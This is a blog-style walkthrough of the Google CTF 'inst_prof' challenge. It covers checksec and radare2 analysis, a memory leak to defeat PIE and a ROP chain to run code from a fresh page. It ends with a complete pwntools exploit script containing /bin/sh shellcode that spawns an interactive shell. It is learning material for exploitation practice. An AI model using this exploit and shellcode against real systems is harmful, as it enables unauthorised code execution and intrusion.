Hello my friends, let me tell you a short (wrong: rather long) story.
Once about a time there was a “capture the flag” (CTF) competition, held by the well known, loaded-with-smart-people company, Google…
I kind of missed the announcement of that CTF and had been in Dublin for a bit of a holidays … when I saw my Twitter feed getting loaded with status updates from people who were trying to crack the various tasks.
Of course I had to try this then as well – and since I am a massive fan of cracking/hacking/reversing binaries, I checked out the “easy” target called “inst_prof”.
And yes, lame, but I failed, utterly (as many many of my contacts on Twitter, too). I literally had no clue how to exploit this. Understanding the application was kind of easy., but at that time, I just had no idea to take advantage out of the discovered vulnerability.
Since that time I promised myself that I will definitely crack this challenge “later”. I just had to save the binary “for later”, learn a shitload of new things and then finally get this sorted.
So I went on a mission, read every writeup out there about this challenge and identified a itzi-bitzi-tiny amount of information I had to learn/digest (and eventually master as well). Copying someone else’s solution was nothing I wanted to go for. I needed to understand how the heck you approach these sorts of challenges in general. I mean, if, one day, I’ll be good enough for winning this (high) level of challenge, i guess then everything will be possible, right? A great benchmark. So,bring it on. What’s new for me to learn?
The following conceptional/technological gaps were identified during the last couple days:
- Return oriented programming (ROP)
- Linux binary protection mechanisms (Cookies? PIE?)
- General debugging/exploiting Linux binaries (no, OSCE and SLAE were just not enough for that)
- radare2 (since it’s a console app, powerful and kind of nicer than gdb)
- Pwntools (because it makes your life easier and is kind of a CTF-standard)
- “Leaking” data?
- And heck, my Python knowledge wasn’t deep enough for packing, byte manipulation, debugging etc and hence needed improvement
So after reading a ton of stuff, trying out various things, reading other people’s writeups, getting me a nice Linux laptop with a great keyboard (sorry, couldn’t stand hacking stuff in a Kali VM on my Macbook any longer) I finally got a working exploit.
As you will see in the following text, I combined a bit of ideas I found in other writeups and gave it my own twist. What I really wanted to avoid is using stuff that I don’t understand (yet). For example leaking data by working with leaked time stamps (rdtsc). That’s still a bit of black magic for me so I avoided using that and looked for other solutions.
Eventually, I achieved my goal. But still, for me this is only version 1 – because this is not the way I wanted to solve this initially. I had a different exploitation concept in my head when checking out the program’s disassembly. So, long story short: I’ll publish another blog post soon with another version with a different approach. Just to learn and just to prove that whatever I had in mind (conceptually) would have worked as well.
Right on fellas, let’s get started. First of course, there’s the analysis of the current situation.
Analysis of the binary
We are dealing with a Linux 64bit binary that’s running as a service. You can connect to it and interact via STDIN. That’s nothing surprising.
And then, first of all, I had to learn about the command checksec. It gives you a nice overview of the security options that are built into a binary.
This means, that we’re dealing with NX (means: you can’t execute code on the stack) and PIE (which is something like we know as ASLR from Windows where the program location in memory is randomized with every program start). This both is here to prevent people exploiting stuff. The NX kind of enforces ROP and the PIE makes the ROP harder (since you can’t hardcode your gadget addresses).
Firing up IDA Pro, I could generate some nice pseudo code in order to understand what the program was supposed to do.
The main function is pretty simple. It basically calls a function called do_test() in an endless loop (I removed the alarm() and sleep() calls upfront to speed up analysis). Here the pseudo code of the main function:
And here the pseudo code for the do_test() function.
Interpreting the do_test code, we can conclude the following activity:
- Allocate a page (0x1000 bytes) of memory (with r/w protection)
- Copy a bit of memory (“template”) to this location
- Read 4 bytes from stdin
- Copy these 4 byte into the middle of the template code
- Mark the page as “executable” (and also remove write access)
- Jump to the template
- Free the page
But … we wanna learn more about radare2. So here: the disassembly of the main function. Hint: use the pdf command to print the disassembly of a function.
And the same for our main actor, do_test.
And here the code for the mentioned template. You can clearly see the 4 bytes of space at 0xc05-0xc08 which will be filled with whatever we send via stdin.
And this already shows the vulnerability. Injecting arbitrary code into an application – this makes it almost too easy. Well, but we only have 4 bytes we can use. So converting this vulnerability into a shellcode execution is not really “difficult” but requires quite a bit of effort as you will see in the following text.
Let’s plan our attack
Exploiting stuff usually follows the same schema:
- Find some memory where you can write to
- Make sure the CPU is allowed to execute from there
- Store your shellcode there
- Redirect the execution flow to that address
- Shellcode gets executed, game over
Since we know that we can’t execute code on the stack, we can conclude that this will be a ROP based exploit. We can use our stack to store the ROP chain there (because we can r/w the stack) and use whatever we have to get our shellcode to some address that allows code execution.
My first attempt to solve this
My first attempt had been to
- do_alloc to allocate memory
- Leak some memory address and calculate ROP gadet addresses based on this
- copy shellcode (from some memory location) into this newly allocated page
- find some place for the ROP chain and then pass execution to there.
But I had no real clue how to do most of it. Especially “leaking” the do_alloc return address into my Python code (for doing calculations) was a bit unclear. So I ditched this for now and scanned for alternatives.
My 2nd attempt
After studying some other writeups, the following structure turned out to be good and doable.
- Allocate a page of memory
- Leak a memory address via STDOUT into the Python app and use it for ROP gadget address calculation
- Read shellcode from STDIN into this new page
- Mark this page as executable
- Redirect execution flow to the new page and execute the shellcode
(of course, all this done as part of a ROP chain)
Disclaimer: I took this idea from these guys. Mad props to your skills. Sorry for kind of copying it but this is my first pwntools CTF exploit -ever- and I really needed inspiration 🙂
This idea was very good and very “easy” to do because the inst_prof binary provided all necessary ROP gadgets in an “easy” accessible way (which is probably the reason why Google marked the whole challenge as “easy”).
Leaking memory via STDOUT (write function) was taken from these guys’ writeup. Thanks and kudos. Good stuff!
As already said – I’ll try to come up with my 100% own version of an exploit in a future blog post. Will try to realize my initial approach without leaking to stdout and without reading the shellcode from stdin. We’ll see. But now, let’s see how I implemented all this.
The implementation (WTF!)
First of all, again, we only have 4 bytes for executing code. And these 4 bytes get repeated 0x1000 times in a loop.
Repeating instructions that do a 1:1 write operation (e.g. mov [r15], r14) is without any harm. The outcome/result will be the same. But other instructions (like inc r15) can’t be repeated without changing the outcome. Hence we need to add a “ret” instructions if we only want to execute something once in order to break out of the 0x1000-times-loop.
What I discovered during my initial analysis was that registers r13, r14 and r15 were not used by the existing code hence could be used for some sort of persistence. So, the idea had then been to use these registers as pointers – we can use that to build some sort of data access layer functionality.
In order to somehow get a grip on it (playing the abstraction game), I wrote helper functions in Python. And yes, much of that code was adapted/copied/inspired by other peoples work. Sorry, this is my first pwntool work – ever, so I needed to pick up so me basics. Please bear with me 🙂
Anyways, to execute an arbitrary assembly instruction, we can use this:
This takes some code, compiles it binary, pads it with nops (so that we always get 4 bytes) and sends it to the pwntooled-binary.
The next bit of code takes a stream of bytes and writes it into the address behind the pointer r15. This pointer then gets incremented afterwards. And since r15 is persistent, we can use that to have a steady pointer to a defined data storage (e.g. for holding a shell code or ROP chain, *hint hint*).
The ROP chain
A logically working ROP chain would look like this (offsets prepended):
00 PTR to do_alloc() 08 PTR to pop_edi gadget 16 PTR to shellcode buffer (returned by do_alloc) 24 PTR to read_n() 32 PTR to pop_edi gadget 40 PTR to shellcode buffer 48 PTR to make_page_executable() 56 PTR to pop_rbx_* gadget 64 PTR to shellcode buffer 72 filler 80 filler 88 PTR to call_ebx()
This will only work because at the moment where we execute our stuff, we have a beneficiary set of data in our registers. For example RSI is loaded with 0x1000 which can be used to read 0x1000 bytes in read_n() without explicitly loading that value to RSI.
The ROP chain itself of course has to include real memory addresses and since the binary is PIE, we need to find the base address of the application by leaking some memory into our Python code before we can calculate the real addresses of our ROP gadgets.
Finding a memory to leak is quite easy since we can just use the return address from the stack that gets pushed there before entering the template() code. We then plan to jump to this specific part of the application (located at offset 0x8a2). Here we plan to write 6 bytes (which is enough) of the memory (-> stack) to stdout (where we then pick it up with our Python exploit app). Here the bit of app code we will use for writing to stdout:
Checking the code, we see that this will work fine since the program will just enter the do_test loop after writing the memory to stdout. So this won’t disrupt our program flow and everything is nice and shiny and great.
So, our leaky sub-game-plan:
- Leak some memory address and calculate the binary’s base address
- Build the ROP chain based on the base address
- Execute the ROP chain
First, we leak the memory address.
We take the last value from the stack (the return memory address) and move it into r14. This will give us the memory at offset 0xb18 – but we need 0x8a2. So we decrement r14 by (0xb18 – 0x8a2) bytes.
We then move the return address (offset 0xb18) into rsi and set r14 (the 0x8a2 offset address) as new return value by pushing it on the stack. Here a picture of the return address right after the call rbx (which calls the template).
After the loop’s ret, the application flow gets redirected to 0x8a2 offset and the app writes the real, PIE’d address of offset 0xb18 to STDOUT. We use Python to parse the result to 64 bit address. Getting the binary base address then is easy – we just have to subtract 0x8a2.
Great, so we now have the base address – which we need to build our ROP chain.
Finding the relative offsets for the ROP gadgets can be done with r2. Please note that this only works if you’re in debugging mode of r2.
It took me a bit to find a nice workflow, combining r2 and pwntools, but in the end I just added pause() instructions to the exploit code whenever I wanted to stop pwntools instructions. I then could attach r2 to the PID of the program and set a breakpoint e.g. to the template call. Hitting the enter key in Python screen then continued execution and triggered the breakpoint in r2.
So, once you’re in debugging, you can hunt for ROP gadgets. E.g. for “pop edi”.
So – the relative offset for this gadget is 0xbc3.
Or, something a bit more fancy. “pop rbx; *.*; ret”.
Which makes it an offset of 0xaa9. We can ignore r12 and rbp since it’s not relevant at the position where we inject this gadget.
We now have everything in our exploit code to build the ROP chain…
… well, EXCEPT for the address of the memory that gets allocated by our ROP call to do_alloc.
Luckily, this code uses mmap and mmap will return a page address that’s 0x1000 bytes lower than the previous page address. And the previous (or current, if you will) page is always the one where the template gets copied to when these 4 bytes get executed.
We can find this (current) page address in rbx. And if we save that value to a register and deduct 0x1000 from it, we can predict the address that our ROP do_alloc() will return and we can inject that into our ROP chain.
Here a quick view into the register setup, the moment where we enter the template.
rbx is our current template (page) address, r13-15 are our minion registers, rsi is 0x1000 (handy for calling read_n). This is probably the reason why this CTF challenge was flagged as “easy”. Everything was just “there”, you just had to plug it together in the correct order 🙂
My plan was then to put the ROP chain on the stack. 0x1000 bytes away from the initial position. So all that needed to be done was to get rsp, put it in r15 (our pointer register), add 0x1000 to it – and we have our ROP start address.
Here the code to setup the ROP chain.
Once this is setup, this whole bag of bytes gets written to rsp+0x1000.
Let’s see how this looks like in real life. We set a breakpoint, right after this code was executed, and inspect the stack at position +0x1000.
Btw – rarare2 has a nice feature called “telescoping” where it dereferences stuff. Really cool. And this looks like this:
So, this looks pretty good – exactly as planned. Well, except for the 0’s at the places where we need the alloc_page return value (rax). I tried to leak that value as well but couldn’t find a gadget to build the prerequisites for write() and hence decided to go for a different approach.
After writing the ROP chain to rsp+0x1000, I wrote a bit of code to use the stored address of the previous page, subtract 0x1000 and inject this new address into positions 16, 40 and 64 of the chain.
Checking the rsp+0x1000 after this patching is done:
Looks good! We see that our RIP is at 0x…21000 and that the next page will be at 0x…20000 – and this address go injected properly.
Right, chain is ready to get. We use some 64bit execute /bin/sh shellcode from shellstorm and trigger the chain.
Please note that we had to pad the shellcode to 0x1000 bytes length since we read that amount of bytes (set by the 0x1000 in rsi).
Finally, we send the code, pull the flag and enter an interactive shell (why not).
Launching the service over the network to simulate the Google setup.
Running the exploit with my handy REMOTE parameter, yielding some output…
Once this is done, we get our shell/flag.
Done! Game over 🙂
Here the complete Python code for the exploit. I’ll upload it to my Github page asap.
#!/usr/bin/env python2 from pwn import * context.arch = "amd64" context.timeout = 60 # execute a command by sending assembly representation of it into buffer # max buffer length: 4 bytes def execute(ASM): # compile asm, pad with nops to fill out all 4 bytes CODE = asm(ASM).ljust(4, asm("nop")) if len(CODE) > 4: print "More than 4 bytes", ASM sys.exit() p.send(CODE) # writes a stream of bytes into memory at r15 def bytes_to_r15(byteString): for b in byteString: execute("mov byte ptr [r15], %d" % ord(b)) execute("inc r15; ret") # write r13 value to memory at r15 def r13_to_r15(offset): for x in range(offset): # seek to memory location by repeating "inc" command execute("inc r15;ret") # write r13 qword into memory at r15 execute("mov [r15], r13") def rsp_to_r15(): execute("mov r15, rsp; ret") #open the process if args['REMOTE']: p = remote('localhost', 31337) else: p = process("./inst_prof") #print program prompt print(p.readline()) # get template() return address from stack execute("pop r14; push r14") # returned address is PIE offset 0xb18 # we would like to jump to 0x8a2 so we dec this address (diff) times r = asm('dec r14; ret') * (0xb18 - 0x8a2) p.send(r) # clean buffers p.clean() # put stack pointer into rsi to write it out with write() command # gets executed 0x1000 times but doesn't hurt us # in the end, execute("push rsp; pop rsi; push r14") log.info("Attempting to leak binary base address...") d = p.recv(4096 * 4096) l = d[len(d) - 6:len(d)] + '\x00\x00' l = u64(l) binary_base = l - 0x8a2 log.info('leak: %#x' % l) log.info('basebinary: %#x' % binary_base) log.info("Building ROP chain ...") #pause() # ROOOPPPPPPINNNNNGGGGGGGGGGG.... 🙂 # some functions we can use due to convenient register setup in the loop alloc_page = binary_base + 0x9f0 make_page_executable = binary_base + 0xa20 read_n = binary_base + 0xa80 # some ROP gadgets we need pop_rdi = binary_base + 0xbc3 pop_rbx_r12_rbp = binary_base + 0xb4d call_rbx = binary_base + 0xb16 # call alloc_page to allocate shellcode buffer ropchain = pack(alloc_page, 64) # fill rdi with shellcode buffer address ropchain += pack(pop_rdi, 64) ropchain += pack(0, 64) # offset 16: address will be corrected in 2nd step # read 0x1000 bytes from stdin ropchain += pack(read_n, 64) # fill rdi with shellcode buffer address ropchain += pack(pop_rdi, 64) # offset 40: address will be corrected in 2nd step ropchain += pack(0, 64) # call make_page_executable to make shellcode buffer executable ropchain += pack(make_page_executable, 64) # pop rbx with shellcode buffer address (+2 other registers which aren't important) ropchain += pack(pop_rbx_r12_rbp, 64) ropchain += pack(0, 64) # offset 64: address will be corrected in 2nd step ropchain += pack(0, 64) ropchain += pack(0, 64) # call shellcode at rbx ropchain += pack(call_rbx, 64) log.info("Writing ROP chain on stack + 0x1000 ...") rsp_to_r15() execute("inc r15") # r15: rsp + 0x1000 # write rop chain bytes to r15 bytes_to_r15(ropchain) log.info("Calculating new mmap address (shellcode buffer)...") #pause() # save old page-0x1000 (next logical mmap do_alloc page) # rsi: 0x1000 execute("mov r13, rbx; ret") execute("sub r13, rsi; ret") #pause() log.info("Patching ROP chain offset  with correct mmap page ....") # adjust r15 to start of rop chain rsp_to_r15() execute("inc r15") # patch rop chain with shellcode buffer address r13_to_r15(16) # adjust r15 to start of rop chain rsp_to_r15() execute("inc r15") log.info("Patching ROP chain offset  with correct mmap page ....") # patch rop chain with shellcode buffer address r13_to_r15(40) # adjust r15 to start of rop chain rsp_to_r15() execute("inc r15") log.info("Patching ROP chain offset  with correct mmap page ....") # patch rop chain with shellcode buffer address r13_to_r15(64) # pause() log.info("Triggering ROP chain") # adjust r15 to start of rop chain execute("mov r15, rsp; ret") execute("inc r15") # pause() # trigger the rop chain by loading r15 into rsp and ret'ing execute("mov rsp, r15; ret") # http://shell-storm.org/shellcode/files/shellcode-806.php # 64 bit Linux, execute /bin/sh shellcode = ( "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c" "\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52" "\x57\x54\x5e\xb0\x3b\x0f\x05" ) # pad to 0x1000 bytes since we read that exact amount with read_n shellcode = shellcode + "\x90" * (0x1000 - len(shellcode)) log.success("All setup - done!") log.info("Now sending shellcode, printing flag and going interactive...") p.send(shellcode) p.send("cat flag.txt\n") p.interactive()